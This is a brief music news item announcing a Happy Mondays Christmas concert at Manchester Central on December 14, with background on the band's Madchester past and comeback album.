Veteran baggy group The Happy Mondays are making Christmas come early this year with a big home town gig.
The band, along with The Stone Roses, were at the centre of the Madchester baggy scene of the late 80s but ground to a halt for a while because of drug and alcohol problems.
However the group returned recently with new album "Uncle Dysfunktional" their first new material in 15 years and have now anounced a big winter gig at Manchester Central on December 14.
Speaking about the show, front man Sean Ryder said: "It's just going to be one pure, big Mancunian Christmas party." Tickets go on sale on Friday September 14.
Friday 14th December Manchester Central
